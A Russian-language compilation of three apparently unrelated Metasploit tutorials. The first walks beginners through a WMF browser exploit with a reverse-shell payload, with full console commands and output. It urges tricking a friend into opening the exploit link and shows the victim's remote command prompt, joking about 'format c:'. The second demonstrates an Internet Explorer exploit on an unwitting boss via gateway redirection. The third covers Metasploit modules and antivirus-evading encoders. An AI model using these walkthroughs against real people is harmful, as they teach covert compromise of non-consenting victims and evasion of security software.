Многие слышали наверно слова Метасплоит, метафайлы, эксплоит, шелл, уязвимость. Очень много вопросов возникает у пользователей (начинающих скрипткидисов, а так же тестеров сплоитов и уязвимостей) которые с этим так или иначе сталкиваются, вот как раз для них эта статья.

Тут я расскажу Вам что такое проект Metasploit Framework и как им пользоваться. Сразу скажу что статья рассчитана для тех кто задаёт вопросы типа этих:

1. cd \
   cd %SystemRoot%\system32
   msfconsole: chdir: failed to change directory No such file or directory
   Это как понимать???
2. или типа этого:
   + — —=[ msfconsole v2.6
3. msf > ls exploits
   
   msf >
   А как понимать это???

Основные понятия и термины используемые в статье

Эксплоит: (англ. exploit - использовать) - это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы.

Шелл-код: Код оболочки, шелл-код (англ. shellcode) - это двоичный исполняемый код, который обычно передаёт управление консоли, например ‘/bin/sh’ Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе.

Реверс-шелл: При эксплуатации удаленной уязвимости шелл-код может открывать заранее заданный порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (англ. port binding shellcode). Если шелл-код осуществляет подключение к порту компьютера атакующего, что производится с целью обхода брандмауэра или NAT, то такой код называется обратной оболочкой (англ. reverse shell shellcode).

Уязвимость: В компьютерной безопасности, термин уязвимость (англ.vulnerability) используется для обозначения слабо защищённого или открытого места в системе. Уязвимость может быть результатом ошибок программирования или недостатков в дизайне системы. Уязвимость может существовать либо только теоретически, либо иметь известный эксплойт.

Уязвимости часто являются результатом беззаботности программиста, но, также, могут иметь и другие причины. Уязвимость обычно позволяет атакующему обмануть приложение, например,с помощью внедрения данных каким-нибудь незапланированным способом, выполнения команды на системе, на которой выполняется приложение, или путем использования упущения, которое позволяет получить непредусмотренный доступ к памяти для выполнения кода на уровне привилегий программы.

Некоторые уязвимости появляются из-за недостаточной проверки данных, вводимых пользователем; часто это позволяет напрямую выполнить команды SQL (SQL-инъекция). Другие уязвимости появляются из-за более сложных проблем, таких как запись данных в буфер, без проверки его границ, в результате буфер может быть переполнен, что может привести к исполнению произвольного кода.

Cygwi (Цигвин): набор свободных программных инструментов разработанных фирмой Cygnus Solutions, позволяющих превратить Microsoft Windows различных версий в некоторое подобие Unix-системы. Изначально Cygwin задумывался как среда для переноса программ из POSIX-совместимых операционных систем (таких как GNU/Linux, BSD и UNIX) в Windows. Программы, портированные с помощью Cygwin, работают лучше всего в Windows NT, Windows 2000, Windows XP и Windows Server 2003, но в некоторых случаях годятся Windows 95 и Windows 98. В настоящее время проект Cygwin разрабатывается сотрудниками Red Hat и другими программистами. Подобные функциональные возможности предлагает также и Microsoft в своём пакете Services for UNIX, включающем в себя подсистему Interix.

Perl (Перл): Язык программирования. Создатель Ларри Уолл (Larry Wall). Само слово Perl - аббревиатура, которая расшифровывается как Practical Extraction and Report Language (практический язык извлечений и отчётов, отчего сначала язык назывался PEARL, но затем буква «A» «потерялась»). Существует также ряд других вариантов. Согласно самому красивому из них, название perl произошло от слова pearl (жемчужина). Талисманом языка Perl является верблюд - не слишком красивое, но очень выносливое животное, способное выполнять тяжелую работу. Основной особенностью языка считаются его богатые возможности для работы с текстом, реализованные при помощи регулярных выражений.

Что такое Metasploit Framework?

Metasploit Framework (согласно описанию) это законченная среда для написания, тестирования и использования кода эксплойтов. Эта среда обеспечивает надежную платформу для испытаний на проникновение, разработки шелкодов и исследования уязвимостей». Написан на Perl (с некоторыми частями на ассемблере, Python и C) – отсюда нет привязки к какой либо платформе – будет работать в любой системе, где есть интерпретатор Perl`a (с оговоркой, см. дальше). На данный момент, пакет Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас. Скачать последнюю версию пакета для соответствующей ОС можно здесь: http://www.metasploit.com/
(Среда под Windows базируется на доработанном Cygwin, что удобно, т.к это дает пользователю известную консоль. Однако, были некоторые проблемы с поддержкой Active Perl, поэтому поддерживается только Cygwin Perl.

Установка (для win- пользователей)

Инсталятор для windows содержит всё необходимое (Сygwin, Perl), т.е. пользователям windows дополнительное ПО скачивать не потребуется.
Качаем (доступная версия 2.6 для windows на момент написания статьи).
Сейчас она актуальней (больше сплоитов).

Запускаем инсталятор: framework-2.6.exe

Получаем: в C:\Program Files\Metasploit Framework\
cygwin.bat (41.0B) — запуск cygwin
msfconsole.bat (86.0B) — запуск консоли MSF
msfupdate.bat (85.0B) — запуск обновления пакета
msfweb.bat (82.0B) — запуск WEB-интерфейса пакета
Metasploit Framework.url (51.0B) — линк на сайт разработчиков
uninst.exe (47.6KB) — деинстализация пакета

а также папки bin, etc, home, lib, sbin, tmp, usr, var — хорошо известные поклонникам Unix-систем.

Использование

Пакет Metasploit Framework имеет два варианта работы: msfconsole (консольный) и web- интерфейс msfweb. Мне удобней всегда работать в msfconsole. Это интерфейс командной строки (по типу cmd с минимальным набором команд), имеющий собственное программное окружение и систему команд. Чтоб посмотреть основные команды наберите в консоли help. Для тех у кого туго с английским привожу перевод help`a. Рассмотрим консольный вариант работы пакета.

Metasploit Framework Main Console Help

? ———— Show the main console help (Показать главное окно помощи)
cd ———— Change working directory (Выбрать рабочую директорию)
exit ———- Exit the console (Выход из консоли)
help ——— Show the main console help (Показать главное окно помощи)
info ———- Display detailed exploit or payload information (Вывести на дисплей детальную инфу о эксплоите или начинке)
quit ———- Exit the console (Выход из консоли)
reload ——— Reload exploits and payloads (Перезагрузить эксплоит и начинки)
save ——— Save configuration to disk (Записать конфигурацию на диск)
setg ———- Set a global environment variable (Установить глобальную переменную окружения)
show ——— Show available exploits and payloads (Показать доступные эксплоиты и начинки)
unsetg ——- Remove a global environment variable (Удалить глобальную переменную окружения)
use ———— Select an exploit by name (Выбрать эксплоит по имени для использования)
version ——- Show console version (Показать версию консоли)
—-нет в help`е——
ls ————- List the current directory (Показать файлы в текущей директории)
exploit ——— Run exploit (Запуск эксплоита)
msf >

М…да, скажете вы help бедноват и команд мало. Ну ничего, сами догоним что к чему.
cd [имя_директории]- стандартная команда (как и в cmd, так и в древнем дос — делает то же самое и здесь, с ней всё ясно, для тех кто в танке наберите help cd в консоли cmd)
Конечно всем не терпится использовать команду use [имя эксплоита], а затем установить переменную PAYLOAD какой либо вкусной начинкой, но всё по порядку, начнём!

Распрастранённые ошибки 90% новичков

1. Ошибка

• Первая команда юзера после загрузки консоли ls exploits
  В этом случае их постигает такой облом:
• msf > ls exploits
  ls: exploits: No such file or directory
  msf >
• И все разом говорят у меня нет эксплоитов!
  А надо сделать всего лишь команду ls без параметров, чтоб посмотреть где мы находимся.
• msf > ls
  framework perl.exe.stackdump run_msfupdate userguide.pdf
  framework.tar run_msfconsole run_msfweb
  msf >
• Вот теперь мы видим, что папки с эксплоитами тут нет, так как она, скорее всего, находится внутри папки framework.
  В чём проблема, переходим в папку framework и посмотрим там:
• msf > cd framework
  msfconsole: chdir: changed to directory framework
  msf >
• Прекрасно! Теперь глянем что тут внутри скомандовав ls:
• msf > ls
  data exploits msfcli msfencode msfpescan nops src
  docs extras msfconsole msflogdump msfupdate payloads tools
  encoders lib msfelfscan msfpayload msfweb sdk
  msf >
• О! Сколько тут всего! И эксплоиты и начинки и доки. Вот теперь можно командовать ls exploits
• msf > ls exploits
  3com_3cdaemon_ftp_overflow.pm mozilla_compareto.pm
  Credits.pm ms05_039_pnp.pm
  ————-много других эксплоитов——————-
  mercantec_softcart.pm wsftp_server_503_mkd.pm
  mercur_imap_select_overflow.pm wzdftpd_site.pm
  mercury_imap.pm ypops_smtp.pm
  minishare_get_overflow.pm zenworks_desktop_agent.pm
  msf >
• Во! Сколько сплоитов! (А говорили нет эксплоитов. оказывается всё со сплоитами в порядке — они есть)

2 Ошибка

• Команда use [имя_экплоита.pm]
• msf > use ie_xp_pfv_metafile.pm
  msfconsole: use: please specify a valid exploit name
  msf >
• Расширение эксплоита pm — указывать не надо, только имя сплоита!
• msf > use ie_xp_pfv_metafile
  msf ie_xp_pfv_metafile >

3 Ошибка

• После удачного выбора нужного сплоита сразу выбирают начинку (забывая про параметры)
• msf > use ie_xp_pfv_metafile
  msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
  PAYLOAD -> win32_reverse
  msf ie_xp_pfv_metafile(win32_reverse) > exploit
  Error: Missing required option: LHOST
  msf ie_xp_pfv_metafile(win32_reverse) >
• Облом! Это что ещё? Перевожу отсутствует (не задана) рекомендованная опция (параметр) LHOST
  Вообщем перед тем как начинять сплоит, я советую задать (установить) все необходимые параметры с помощью команды set.
  У каждого сплоита их может быть разное количество (зависит от конкретной уязвимости)
  Ну и что делать, как узнать какие параметры у какого сплоита? Ответ уже был выше! в help`e! Командуем: info [имя_сплоита], например узнаем всё про wmf-сплоит (ie_xp_pfv_metafile)
• msf > info ie_xp_pfv_metafile
  Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Executi
  Class: remote
  Version: $Revision: 1.18 $
  Target OS: win32, winxp, win2003
  Keywords: wmf
  Privileged: No
  Disclosure: Dec 27 2005
• Provided By:
  H D Moore san
  O600KO78RUSunknown.ru
• Available Targets:
  Automatic — Windows XP / Windows 2003 / Windows Vista
• Available Options:
• Exploit: Name Default Description
  ——— ——— ——- —————————————
  optional REALHOST External address to use for redirects
  T)
  optional HTTPHOST 0.0.0.0 The local HTTP listener host
  required HTTPPORT 8080 The local HTTP listener port
• ……….пропущено………….
  msf >
• Вот вам вся и подробная инфа о сплоите, нас интересует optional
  Для ленивых:
  HTTPHOST (LHOST) — Локальный IP адрес сервера на котором повиснет сплоит (адрес твоего компа)
  HTTPORT (LPORT) — его порт (8080 — по умолчанию)
  REALHOST (RHOST) — внешний адрес для редиректа (WAN — адрес если твой комп находится за NAT)

4. Ошибка

• Важно! Всегда и везде имена переменных окружения писать только ЗАГЛАВНЫМИ буквами!

5. Ошибка

• >msf ie_xp_pfv_metafile(win32_reverse) > exploit
  msf >Could not start listener: Operation not permitted
  Что делать? — освободить порт (уже занят чем то, буквально — не могу запустить слушатель:операция не разрешена) или использовать другой, например set LPORT 8081

6 Ошибка

• Client connected from ххх.ххх.ххх.ххх:1879…
  Undefined subroutine &Pex::Utils::JSUnescape called at /home/framework/exploits/
  ie_vml_rectfill.pm line 156.
  Exiting Reverse Handler.
  msf ie_vml_rectfill(win32_reverse) >
  Это ещё что? Неопределённая подпрограмма и … ну вообщем скорее всего вы скачали свежий сплоит и засунули в старую версию пакета, вообщем работать не будет. Cплоиты которые вышли после пакета в большинстве своём будут работать только на свежей версии, на данный момент 2.7 (как раз касается свежего сплоита ie_vml_rectfill.pm. Так что или обновляйте пакет, либо качайте последний…

Пример
(практическое использование)

• Эксплоит: ie_xp_pfv_metafile, начинка win32_reverse
• msf > use ie_xp_pfv_metafile
  msf ie_xp_pfv_metafile > set LHOST 10.0.0.1
  LHOST -> 10.0.0.1

Вообщем разобрались задали всё необходимое для сплоита, теперь можно переходить к начинке:
командуем set PAYLOAD [имя_начинки],

• msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
  PAYLOAD -> win32_reverse
  msf ie_xp_pfv_metafile(win32_reverse) >msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.

Готово! Консоль говорит, что жду соединений к http://10.0.0.1:8080/
Впариваем ссылку другу (или подружке) например через асю..

Маша, смотри какой прикол: http://10.0.0.1:8080/ (прим. вообще-то тут должен быть внешний ip)

[*] HTTP Client connected from 10.0.0.2:1116, redirecting… — клиент соединился, его IP 10.0.0.2:1116, редирект

[*] HTTP Client connected from 10.0.0.2:1117, sending 1604 bytes of payload… — отправлено 1604 байт начинки (реверс-шелл тут)

[*] Got connection from 10.0.0.1:4321 10.0.0.2:1118 — установлено соединение (пайп с cmd удалённого компа)

• Microsoft Windows XP [‘?абЁп 5.1.2600]
  (‘) ?RаЇRа жЁп? cЄаRбRдв, 1985-2001.
  <>

О блин!, Это ещё что, скажете Вы — это командная строка удалённого компа того юзверя!
А что за абракадабра? — Это не та кодовая страница выбрана (у него русская винда стоит!) Сейчас проверим! chcp

• C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp
  chcp
  ‘?Єгй п ЄR¤Rў п бва -Ёж: 866
  <>

Точно это 866, поставим 1251 (виндовую, а не до с)

• C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp 1251
  chcp 1251
  ‘?Єгй п ЄR¤Rў п бва -Ёж: 1251
  C:\Documents and Settings\Администратор\Рабочий стол>

О! Теперь всё по русски! Что делать в cmd чужого компа зависит от вашей фантазии, список команд смотрите в help по консольным командам windows. (format c: — жесть!)
Был разобран конкретный пример использования WMF-Эксплоита с начинкой реверс-шелла, ваши варианты могут быть другими.

ПАВЕЛ ТРОИЦКИЙ

Исследование уязвимостей с помощью Metasploit Framework

Учиться никогда не поздно, а учить других – приятное занятие... Из этой статьи вы сможете узнать о том, как просто и наглядно можно продемонстрировать работу большинства уязвимостей с помощью Metasploit Framework.

Всё что ни случается в жизни – к лучшему... В одно субботнее утро мне пришлось отважно поработать. Согласитесь, не самое приятное занятие, особенно в свой выходной день. Нона ситуацию можно посмотреть и с другой стороны.

Через несколько часов утренней работы, когда я освободился и пребывал в состоянии сна на ходу, меня уже не тянуло домой. Я плыл по коридору, где стояла убаюкивающая тишина по сравнению с шумными буднями. Не помню как, наверное, сработало любопытство, услышав издалека характерные непрекращающиеся звуки быстрого нажатия клавиш на клавиатуре, я на автопилоте изменил курс и пришвартовался в соседнем отделе.

Люблю наблюдать за увлечённо работающими людьми. Оказалось, мой тёзка и коллега сидит за двумя своими мониторами и что-то решает. Я мягко приземлился в одно изпустующих кресел, включил чайник и стал ждать.

Пашок вернулся к жизни и заметил меня лишь только когда чайник закипел и громко щёлкнул своим термовыключателем на всю комнату. Видимо, сработало то, что чайник он неставил.

Увидев меня, он быстро заварил себе кофе, сел обратно на своё место и явно обрадовался тому, что сможет излить мне свою душу во время чаепития и найти понимание. Так и оказалось. Он решал одну интересную задачу, которую ему поставил шеф, с микроконтроллерами, при этом думая и о другом задании, на которое времени не хватало.

Второе задание было более интересным, чем первое, я постараюсь описать его вам, а далее предложить придуманное нами решение.

Закрытый код – враг народа?

Не секрет, что технический отдел с его руководством косо посматривают на тех, кто использует программы с закрытым кодом, к тому же содержащие много уязвимостей. Когда руководство компании понимает проблему, это хорошо. Техническому отделу дается зелёный свет, и вся организация переходит на более правильные и безопасные для фирмы решения.

Но бывают и другие случаи, когда руководство, опираясь на мнение друзей и знакомых, делает вид, что разбирается, а на самом деле это не так.

Например, не все оценивают преимущества новых версий Linux, OpenOffice или браузера Mozilla Firefox (по сравнению с их закрытыми и не всегда стабильно работающими аналогами: Windows, MSOffice или IE).

Люди инертны, привыкли к чему-то и менять ничего не хотят. Рыба гниёт с головы – бывают случаи, когда руководство не допускает технический отдел к своим компьютерам (особенно ноутбукам), являясь не только источником нарушений безопасности, но и первой целью для происков конкурентов.

Цель задания состояла в том, чтобы вернуть авторитет техническому отделу, прочитать ознакомительную лекцию для персонала и провести в жизнь решения по установке ипереходу на более безопасные Open Source аналоги, мотивируя это не своим желанием, а приказом руководства, стоящего над техническим отделом.

Задача, кажется, ясна, если у вас есть многолетний опыт, наверняка вы смогли в ней увидеть что-то пересекающееся из своей жизни или похожее. Давайте рассмотрим случай решения, когда хитрость идёт на пользу общему делу. Если у вас есть более интересные решения – пишите на форум журнала, обсудим!

Решение

Как действовать? Так как Глобальной сетью пользуются практически все, а она представляет немалую угрозу любому подразделению, то поставим цель – отучить пользователей использовать IE.

Если обратиться к классике, то существует не так много различных подходов к решению проблем :

• если сделать проверку на используемый браузер и отключить обращения IE в сеть на прокси-сервере, то это будет не самое лучшее решение, а администратора можно будет классифицировать как «маньяка»;
• если удалить всем пользователям IE, то это будет администратор-«идиот», и проблема также не решится;
• если пытаться пакостить пользователям, запускающим IE, это будет администратор-«фашист» – успеха он тоже не добьётся, так как будет все силы тратить на борьбу со следствием.

Наиболее правильно – это пойти на хитрость и бороться с причиной. Представьте, если все пользователи осознанно откажутся от какого-то решения, то какой будет смысл в мире бизнеса производителю продвигать это решение?

Наиболее удачно для нашей задумки подходит тип администратора «технический бандит».

Мы изучим различные нюансы работы браузеров и существующие в них уязвимости, поставим специальные программы, демонстрирующие скрытые возможности, возникающие из-за ошибок, и тем самым заставим руководство принять правильное решение.

Проверь систему на уязвимость

Очевиден факт, что в любой большой программе есть ошибки. Это практически все понимают, и начальство в том числе. Поэтому для проверки сетей и отдельных хостов давно придумали различные сканеры. Но не все понимают специфику их работы.

Если Nessus, Shadow Security Scanner, nmap, XSpider и другие в какой-то мере удобны и успели себя хорошо зарекомендовать, то опираться на их результаты следует с пониманием происходящего.

Например, как быть со случаем, когда исполнение какого-либо кода (содержащего уязвимость) происходит со стороны пользователя, а не инициируется внешним сканером? Несекрет, что многие, просканировав свой компьютер (или сервер) и не обнаружив открытых портов и уязвимых сервисов, ошибочно думают, что их системы в полном порядке.

Мы попытаемся доказать эту ошибку на примере браузера IE с помощью программы Metasploit Framework.

План действий. Немного теории

Получая различные рассылки по вопросам безопасности или посещая сайты по подобной тематике, периодически встречаешь информацию о различных уязвимостях. Такая-то уязвимость позволяет передать клиенту и выполнить на его стороне какой-либо код, такая-то просто завершает приложение.

В теории получается следующее: вы заходите на сайт XXX, а у вас вместо этого открывается окно терминала, где запускается команда «format с:».

Пример утрирован, но, если вам в это сложно поверить, к концу статьи вы сможете провести аналогичный эксперимент у себя.

The Metasploit Project

Это проект , созданный фирмой Metasploit LLC, содержащий полезную информацию для людей, занимающихся пополнением баз данных для СОА (систем обнаружения атак), а также исследованием уязвимостей и того, как они работают.

Цель ресурса – собрать различную информацию об известных эксплоитах и уязвимостях вместе с реализующими их кодами, чтобы эта информация была доступна администраторам безопасности и разработчикам.

На сайте содержится несколько разделов, содержащих полезную информацию.

Нам понадобится раздел Framework (см. рис. 1), посвящённый платформе, на которой можно реализовать наш план.

Ищем Download внизу и скачиваем framework-3.2.tar.gz.

Установка Metasploit Framework

Ранее программа была доступна только через CLI (интерфейс командной строки), в связи с чем была известна только в узких кругах.

Недавно появилась поддержка GUI (графического интерфейса), что сделало программу более привлекательной для менее опытных пользователей (особенно наличие версии программы под Windows). Хорошо это или плохо, сказать сложно. Мы выберем версию под Linux и GUI-интерфейс.

В качестве операционной системы взята недавно вышедшая Fedora 10. Конечно, она не без проблем. Скорее всего, через полгода – год мелкие проблемы будут решены, и она станет рабочей платформой для многих администраторов, а пока она очень подходит для наших экспериментов. Если взять более ранние версии (Fedora 8, 9), то принципиальных различий в установке быть не должно.

Для работы графического интерфейса необходима установка языка Ruby и библиотек:

• ruby-1.8.6.287-2.fc10.i386.rpm;
• ruby-libs-1.8.6.287-2.fc10.i386.rpm;
• ruby-gtk2-0.18.0-2.fc10.i386.rpm;
• ruby-libglade2-0.18.0-2.fc10.i386.rpm;
• ruby-atk-0.18.0-2.fc10.i386.rpm;
• ruby-cairo-1.8.0-1.fc10.i386.rpm;
• ruby-gdkpixbuf2-0.18.0-2.fc10.i386.rpm;
• ruby-glib2-0.18.0-2.fc10.i386.rpm;
• ruby-gnome2-0.18.0-2.fc10.i386.rpm;
• ruby-gnomecanvas2-0.18.0-2.fc10.i386.rpm;
• ruby-libart2-0.18.0-2.fc10.i386.rpm;
• ruby-pango-0.18.0-2.fc10.i386.rpm.

Сделать это можно либо вручную через команды:

rpm -ihv *.rpm

либо через:

yum install ...

тогда достаточно указать лишь первые четыре пакета, все остальные будут определены как зависимые и установятся сами.

Следующим этапом надо распаковать скачанный архив framework-3.2.tar.gz в какую-либо директорию, зайти в неё и с правами администратора запустить файл msfgui.

Права администратора (root) нужны для того, чтобы программа могла открывать сокеты на прослушивание на любом порту (например, на 80-м, протокол TCP).

Запуск программы

Теперь, выбирая уязвимости (в базе Metasploit Framework их немало), мы можем попытаться реализовать сервер, который сформирует код, который будет передан клиенту, для выполнения на его стороне. А далее выполним проверку клиента на уязвимость. В качестве уязвимой машины была выбрана первая находившаяся под рукой, а именно с Windows 2003 и IE 6.0 (cм. рис. 5). Кстати, некоторые администраторы, не утруждая себя, часто ищут что-то в Сети по интересующим их вопросам прямо из консоли сервера, при этом ставить альтернативные браузеры они не собираются, мотивируя это тем, что подобные выходы в Интернет «на коленке из серверной» у них редки. Замечу, чтобы скомпрометировать сервер, достаточно одного случая!

А далее ситуация проста: главная задача – заманить жертву или всезнающего шефа на наш компьютер. В Интернете подобное решается социальным способом, то есть обходным путём. Например, с помощью размещения различных баннеров либо переадресацией с помощью popup-окошек с уже заражённых сайтов. Такое часто встречается на сомнительных сайтах (бесплатное скачивание коммерческих программ, порносайты и пр.), предлагающих кликнуть на какой-нибудь баннер.

В локальной сети, будучи её администраторами, мы можем завернуть обращение на шлюзе куда нам надо, а после показать шефу, что любой вполне безобидный сайт может творить чудеса с его компьютером (запускать другие приложения, копировать его документы и пр.), при условии что у него даже может быть запущен антивирус.

Конечно, всё это многообразие действий зависит от вашей фантазии, а цель статьи лишь показать направление и что такое возможно. Поэтому мы ограничимся лишь одной уязвимостью в качестве примера и запустим какую-нибудь безобидную программу на компьютере жертвы, например «Калькулятор». Не секрет, что для написания статьи, чтобы никого не обманывать, в течение получаса пришлось перебирать уязвимости, чтобы найти работающую в данной конфигурации.

В качестве уязвимости была выбрана описанная в Microsoft Security Bulletin MS06-067 – выбираем эту уязвимость в базе программы (см. рис. 6).

Прописываем порт 8081 и команду для запуска на машине с уязвимым бараузером «c:\windows\system32\calc.exe» (см. рис. 8).

Замечание: если вы хотите прописать 80-й порт, а у вас работает httpd-сервер, то не забудьте его остановить, например, командой:

# service httpd stop

или:

# /etc/rc.d/init.d/httpd stop

иначе непонятно, какая из двух программ должна прослушивать порт на входящие соединения. С этой целью в примере взят порт 8081, который заведомо будет свободен.

После подтверждаем настройки (см. рис. 9) и в списке висящих заданий (jobs) у нас появляется новая задача (см. рис. 10).

Окно машины жертвы (см. рис. 11).

Заключение

Конечно, данный пример тривиален, и для того чтобы поразить окружающих или вашего шефа, лучше его модифицировать, учитывая специфику. Мы так устроены, что какое-либо действие (изменения) привлекают нас больше, поэтому для людей, не очень понимающих, как осуществляется переполнение буфера, лучше вместо калькулятора запустить архиватор с ключами, чтобы в окошке была анимация, например «бежало» число процентов сжатых файлов из папки «Мои документы\конфиденциально». Тогда и сказать, что этот сайт нацелен на сбор информации с компьютера вашего шефа, будет проще и ваши аргументы будут весомее. Раз сайт запустил архиватор, а не какой-нибудь калькулятор, то проблема намного серьёзнее. Хотя надеюсь, что большинство читателей, читая эти строчки, улыбнутся лишний раз.

Также эту статью и пример можно использовать в образовательных целях. Чем не пособие для преподавателей на курсах по безопасности или в вузах по проведению демонстраций или лабораторных работ? Выполнять такую лабораторную работу студентам будет куда интереснее, чем обсчитывать не всегда понятные результаты.

Если вы задумались, а не пора ли вам обновить/сменить систему или бразуер, то значит, вы на верном пути!

1. Робачевский А. М. Операционная система UNIX. – СПб.: БХВ-Петербург, 2002, ISBN 5-8206-0030-4.
2. Сайт проекта The Metasploit Project, содержащего информацию и эксплоиты по различным уязвимостям, – http://metasploit.com .
3. Уязвимость Microsoft Security Bulletin MS06-067 – http://www.microsoft.com/technet/security/Bulletin/MS06-067.mspx .

Вконтакте

Мы написали много статей по взлому с использованием Metasploit , в том числе о том, как не оставлять следов, об изучении внутренней архитектуры сайта, а также массу шпаргалок по командам и скриптам.

Этим руководством мы начинаем объемную серию статей для обучения и использования Metasploit . Эта первая ознакомительная часть, где кратко будут рассмотрены основы Metasploit - одной из самых мощных хакерских платформ на планете Земля.

Происхождение и установка Metasploit

Metasploit - проект с открытым исходным кодом, разработанный хакером HD Moore в 2003 году. Первоначально он был написан на Perl , но в 2007 году полностью переписан на Ruby . В 2009 году был выкуплен Rapid7 , компанией специализирующейся на предоставлении услуг по информационной безопасности, которая также выпустила сканер уязвимостей Nexpose .

Metasploit версии 4.12 уже включен в дистрибутив Kali Linux . Он также встроен в BackTrack . Если вы используете другой дистрибутив Linux или MaxOS , то вам придется скачать его с сайта Rapid7 .

Если вы используете Windows , то вам также придется скачать Metasploit с сайта Rapid7 , но мы не рекомендуем запускать его в Windows . Вы, безусловно, сможете это сделать, однако многие функции, которые мы будем рассматривать в этой статье, просто не будут там работать.

У Metasploit есть несколько версий, в том числе Metasploit Pro (полностью коммерческая версия) и Community Edition (бесплатная). Вот последняя как раз и встроена в Kali . Мы сосредоточимся на Community Edition , поскольку мы думаем, что большинство из вас не будет покупать Pro версию стоимостью в $ 30 000.

Способы использования Metasploit

Metasploit можно использовать несколькими способами. Наиболее распространенный способ, который и мы все время используем - это интерактивная консоль Metasploit . Она активируется путем ввода msfconsole в командной строке Kali . Существует также несколько других методов.

Msfcli

Начнем с того, что вы можете использовать Metasploit из командной строки Kali или в режиме msfcli . На первый взгляд кажется, что когда мы находимся в консоли, мы используем командную строку. В действительности же мы используем интерактивную консоль со специальными ключевыми словами и командами. Когда же мы работаем из msfcli , то фактически используем командную строку Linux.

Чтобы получить информацию обо всех доступных командах msfcli , наберите в консоли:

Kali > msfcli -h

Теперь, чтобы выполнить эксплоит из msfcli наберите команду:

Kali > msfcli payload = rhost = lhost = E

Где «E» - сокращение от «Execute» (выполнить)

В нашей статье по созданию payload (полезных нагрузок) для защиты от антивирусных программ мы используем команду msfencode и msfpayload в режиме командной строки (msfcli ).

Недостатком использования msfcli является то, что он не так хорошо поддерживается как msfconsole , и вы ограничены единственным шелом, что делает некоторые из более сложных эксплойтов невозможными.

Armitage

Если вы хотите использовать Metasploit с графическим интерфейсом (GUI), то здесь есть несколько вариантов. Например, Рафаэль Мадж (Raphael Mudge) разработал Armitage (это имя главного героя в весьма оригинальной научно-фантастической книге о кибер-хакинге «Neuromancer». Ее должен прочитать каждый хакер, которому нравится жанр SciFi ).

Чтобы запустить Armitage в Kali , просто введите:

Kali > armitage

Если Armitage не может соединиться, то попробуйте другие команды:

Kali > service start postgresql kali > service start metasploit kali > service stop metasploit

Armitage - это графический интерфейс поверх самого Metasploit , построенный на архитектуре клиент-сервер. Вы запускаете Metasploit в качестве сервера, и Armitage становится его клиентом, предоставляя вам полный доступ к функциям Metasploit с помощью полнофункционального, хотя и не интуитивно понятного GUI . Если вам действительно нужен GUI , чтобы чувствовать себя комфортно, то, пожалуйста, используйте Armitage . Но овладение командной строкой - практически жизненная необходимость для любого уважающего себя хакера.

Модули

У Metasploit есть шесть разных модулей:

1. payloads
2. exploits
3. post
4. nops
5. auxiliary
6. encoders

Payloads - это код, который мы оставляем на взломанной системе. Некоторые называют их слушателями (listener), руткитами (rootkit) и т.д. В Metasploit они называются payload (полезными нагрузками). Payloads включают утилиты командной строки, Meterpreter и т.д. Payload ‘ы бывают разных типов, например, staged , inline , NoNX (обходит функцию «No Execute» (без выполнения) в некоторых современных процессорах), PassiveX (обходит правила брандмауэра об исходящем трафике), IPv6 и другие.

Exploits - это шелл-код, который использует уязвимость или недостатки в системе. Это очень специфичный код. Например, есть эксплоиты для операционной системы, пакетов обновлений (SP), для конкретных служб, портов и даже для приложений. Их также можно классифицировать по типам операционных систем, поэтому эксплойт Windows не работает в Linux и наоборот.

Post - это модули, которые мы можем использовать для пост эксплуатационных атак системы (т.е. после получения доступа к системе).

Nops - сокращение от No OPerationS. В процессорах семейства x86 обычно указывается как шестнадцатеричный 0x90. Это просто означает «ничего не делать». Это может иметь решающее значение для атак переполнения буфера (buffer overflow). Мы можем посмотреть модули nops с помощью команды show .

Msf > show nops

Auxiliary - включает в себя множество модулей (695), которые не вписываются ни в одну из других категорий. К ним относятся такие вещи, как фьюзеры (fuzzer), сканеры (scanner), модули для DoS-атак (на отказ в обслуживании) и многое другое. За более подробной информацией отсылаю вас к нашей статье об Auxiliary модулях.

Encoders - это модули, которые позволяют по-разному кодировать нашу полезную нагрузку (payloads), чтобы обойти антивирусное ПО и другие системы безопасности. Мы можем увидеть эти кодировщики, набрав:

Msf > show encoders

Как видите, в Metasploit встроено довольно много кодировщиков. Один из наших фаворитов - shikata_ga_nai . Он позволяет использовать payload XOR , что помогает обманывать антивирусные программы и другие системы безопасности.

Поиск

В Metasploit 4 появилась возможность поиска. Раньше приходилось использовать msfcli и команду grep , чтобы найти модули. Теперь Rapid7 добавил поиск по ключевым словам и некоторые другие особенности. Добавление поиска было очень своевременным, поскольку Metasploit значительно разросся, а обычного поиска по запросам grep было уже недостаточно, чтобы найти что-нибудь среди более чем 1400 эксплойтов.

Поиск по ключевым словам позволяет выполнять как простой поиск, так и делать более детализированные поисковые запросы. Например, мы можем определить тип модуля, который нужно найти, используя ключевое слово type:

Msf > search type:exploit

Если мы это сделаем, то Metasploit вернет нам 1295 эксплойтов. Не очень полезно.

Но если мы знаем, что хотим атаковать машину Sun Microsystems под управлением Solaris (Sun UNIX ), то мы можем уточнить наш поиск и искать только эксплоиты для Solaris . В этом случае нам нужно использовать ключевое слово platform .

Msf > search type:exploit platform:solaris

Теперь мы сузили наш поиск до тех немногих эксплойтов, которые будут работать против Solaris .

Для дальнейшего уточнения поиска предположим, что мы хотим атаковать Solaris RPC (sunrpc ) и, соответственно, нам нужно видеть только те эксплоиты, которые атакуют эту конкретную службу. Мы добавляем ключевое слово «sunrpc » в наш поисковый запрос, как показано ниже:

Msf > search type:exploit platform:solaris sunrpc

Как видите, это сузило результаты поисковой выдачи до пяти модулей эксплойтов!

